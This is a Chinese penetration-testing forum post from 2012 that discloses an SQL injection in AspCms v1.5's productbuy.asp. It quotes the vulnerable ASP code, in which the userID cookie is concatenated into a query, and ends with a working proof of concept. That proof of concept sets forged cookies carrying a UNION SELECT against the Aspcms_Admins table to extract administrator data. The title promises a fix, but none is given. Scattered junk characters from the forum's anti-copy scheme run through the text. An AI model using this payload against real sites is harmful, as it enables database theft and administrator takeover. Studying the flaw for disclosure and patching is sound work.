中国网络渗透测试联盟

标题: AspCms_v1.5_20110517 SQL注射漏洞及修复 [打印本页]

---

作者: admin    时间: 2012-12-27 08:35
标题: AspCms_v1.5_20110517 SQL注射漏洞及修复
好久没上土司了，上来一看发现在删号名单内.....
$ v1 G3 S4 j% w也没啥好发的，前些天路过某个小站，用的AspCms这个系统，搜索了下，productbuy.asp这个文件存在注射，但是目标已经修补....下载了代码，很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞，但是就在同一个文件下面找到了注射漏洞。。。。。。。
废话不多说，看代码：
/ ^9 j4 h! P+ `  N# H1 c1 a
7 z. {3 T' H2 X<%

0 Q+ V8 m/ Q4 {if action = "buy" then

        addOrder()

9 s3 E2 K8 n/ t& @( K$ xelse

        echoContent()

end if

2 K4 R4 ?, ^$ \$ _) H/ T

) a0 U1 l5 {8 s$ ^3 L( h……略过


; ?6 i9 `8 Y/ Y* q% H
' T* u: N) C. |+ Y( I6 ]9 x5 qSub echoContent()

/ i( ]/ z( J4 [2 t        dim id

8 o* K+ e: y7 n$ ~        id=getForm("id","get")
, J* y1 m( A3 ^5 ]7 T
        

. T! Y% j$ A  S$ w        if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品！","-1"
- r& ~4 p4 j' K0 C. H$ o, ]
& d1 |: q% M' ~( Q- z! Q        
8 M/ d  S. V; z& B% d4 T
        dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")
4 V1 R% U2 e7 d
        dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct

: i9 d0 G! U1 b% Y* T        Dim templatePath,tempStr
% Q9 L% s; j& y( f0 S
        templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"
' P, T. A. X: W9 u7 c
$ ?- {1 m) R2 X2 Q3 K& b: t2 h4 ]
7 j) A0 C. u7 r. b+ i/ \+ ]
        set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1")
' Q/ l9 u: y: g1 q
        selectproduct=rsObj(0)

        

        Dim linkman,gender,phone,mobile,email,qq,address,postcode

: P  k3 Y8 t7 a( ]) `* b% B        if isnul(rCookie("loginstatus")) then  wCookie"loginstatus",0

& t2 [( y# A  R        if rCookie("loginstatus")=1 then  
  F* d9 D8 B/ U
, ~0 _6 i% h$ \! ^" q                set rsObj=conn.Exec("select *  from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")

- @# n/ ?" c. R7 {! e                linkman=rsObj("truename")

2 O; [5 N. ]' H6 i! [( {$ Q                gender=rsObj("gender")

                phone=rsObj("phone")

* c7 w! ~( o+ Z( P5 N                mobile=rsObj("mobile")

                email=rsObj("email")

* n: A4 v8 [1 \' a% z7 u                qq=rsObj("qq")

. w( A; q! k, [, ]1 A$ w+ U                address=rsObj("address")
5 i, w% S# o+ k# u! d
; ]3 e; Y5 D) W                postcode=rsObj("postcode")
) Y/ b8 w' d; \
        else
, S6 {+ N& z8 L" L! r; \
                gender=1
# @1 g; \; ~$ I: L  t
# L: ?9 Q% f$ ?7 u        end if

        rsObj.close()

; J: |* h/ a4 v% _0 `: p/ ]3 d               
( T* w( H% E9 ?( v. W7 y
        with templateObj

5 ?5 o; a3 K2 ?$ Q/ p                .content=loadFile(templatePath)        
! v8 D! W. P# b) _$ _& E
$ b& Z/ H* n4 M  Y3 Q. z                .parseHtml()
% u; H+ v7 z/ C" \" [
                .content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct)
6 t1 L8 L; Q8 z
3 U; p# |% Z* @                .content=replaceStr(.content,"[aspcms:linkman]",linkman)               

                .content=replaceStr(.content,"[aspcms:gender]",gender)               
: Z% `( n; \/ J* `1 a- {! v$ B
. U* ]+ f( P2 O/ x                .content=replaceStr(.content,"[aspcms:phone]",phone)               
. m+ K1 y* G+ z/ t% v) R
                .content=replaceStr(.content,"[aspcms:mobile]",mobile)               
+ Y! b0 W9 D) E# X
                .content=replaceStr(.content,"[aspcms:email]",email)                        

                .content=replaceStr(.content,"[aspcms:qq]",qq)                        

                .content=replaceStr(.content,"[aspcms:address]",address)                        

                .content=replaceStr(.content,"[aspcms:postcode]",postcode)        
9 {4 C, o3 F5 E6 H8 h! N/ h* H
$ ~0 [2 o$ S' M+ X; v, |% J, ~' x0 a: @                .parseCommon()                 
, F" u) }' ^2 y% J, K( \
                echo .content
( n: o+ ]! S; _; J
        end with
2 B8 N( i$ j" e' q
        set templateobj =nothing : terminateAllObjects

& L. v# D! k3 `1 z7 HEnd Sub
& X. K8 O# o: [. E7 y: F漏洞很明显，没啥好说的
poc：
& }+ A) C$ p1 U, k- a4 C$ A7 w) l
javascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));另外，脚本板块没权限发帖子​

' Z5 \& L1 x1 I# f" m7 a8 w- ?

---

欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)

Powered by Discuz! X3.2